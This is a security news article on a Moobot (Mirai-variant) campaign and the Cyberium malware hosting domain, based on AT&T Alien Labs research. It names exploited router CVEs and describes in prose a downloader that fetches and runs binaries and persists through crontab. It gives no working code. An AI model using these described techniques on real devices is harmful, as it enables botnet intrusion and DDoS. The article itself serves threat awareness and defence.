A variant of the Mirai botnet called Moobot saw a big rise in activity recently, with researchers picking up widespread scanning in their telemetry for a known vulnerability in Tenda routers.
It turns out that it was being sent from a new cyber-underground malware domain, known as Cyberium, which has been hosting a large amount of Mirai-variant activity.
An analysis of the campaign revealed Cyberium, an active Mirai-variant malware hosting site.
According to AT&T Alien Labs, the scanning for vulnerable Tenda routers engaged researcher interest given that such activity is typically rare. The targeted bug is a remote code-execution (RCE) issue (CVE-2020-10987).
“This spike was observed throughout a significant number of clients, in the space of a few hours,” according to an AT&T analysis, released Mon. “This vulnerability is not commonly used by web scanners & was barely detected by our honeypots during the last 6 months, except for a minor peak in Nov.”
Following the breadcrumbs of the activity, researchers tracked down the infrastructure behind the Tenda scans in late Mar. – discovering that it was being used to scan for additional bugs, in the Axis SSI, Huawei home routers (CVE-2017-17215) & the Realtek SDK Miniigd (CVE-2014-8361).
It was also deploying a DVR scanner that tried default credentials for the Sofia video application. These compromise efforts were tied to a variety of different Mirai-based botnet infections, including the Satori botnet.
A read across all of the activity is that the malware deposited on compromised devices was pulled from the same malware hosting page: dns.cyberium[.]cc.
“When this domain was investigated, several campaigns were identified, going back at least 1 year to May 2020,” according to AT&T. “Most of the attacks lasted for approximately a week while they hosted several Mirai variants.”
Each campaign had its own subdomain page below the top-level Cyberium page, & when it was completed, the subdomain became unresolvable. While active, the campaign would cycle between different Mirai variants: The same URL could be hosting Satori 1 day & Moobot the week after, according to AT&T.
“The actors appear to come back to the same domain with a new subdomain for each new campaign,” researchers explained.
“Activity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.”
After initial compromise of a targeted internet of things (IoT) device, the 1st request to Cyberium was for a bash script that acted like a downloader.
“The script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself & finally deletes itself,” according to the analysis.
This script is very similar to downloaders previously seen for Mirai variants; researchers noted.
Moobot was 1st spotted in April 2020, using a pair of zero-day exploits to compromise multiple types of fibre routers. Then last Oct., it was seen going after vulnerable Docker APIs. In all cases, the goal is to add devices as nodes in a botnet used to carry out distributed denial of service (DDoS) attacks, just like Mirai itself. It is not one of the more common variants, however.
One of the main distinctions of Moobot is a hardcoded string that is used several times throughout the code, including generating the process name to be used during execution, according to AT&T.
“The number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,” AT&T noted. “This could potentially mean that last year’s Moobots samples were used to create new branches of Mirai variants.”
In a new wrinkle, the observed Moobot samples were encrypted.
“However, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as: Private ranges, the Department of Defence, IANA IPs, GE, HP & others,” according to the analysis.
AT&T found that Cyberium has been in action for the past year or so & that it appears to be active still. At the time of publication, some of the Cyberium subdomains were up, but not hosting any malware samples – potentially indicating that the pages are awaiting new requests for command-and-control server (C2) lists, according to AT&T.
The researchers said that the cyber-criminals behind Cyberium remain somewhat mysterious.
“Several questions remain unanswered,” researchers concluded. “Why would the attackers deliver different Mirai variants with different C2s on the same campaign? Are they trying to avoid anti-virus detection through diversification of variants? Or are they trying to improve the botnet resiliency by diversifying C2.”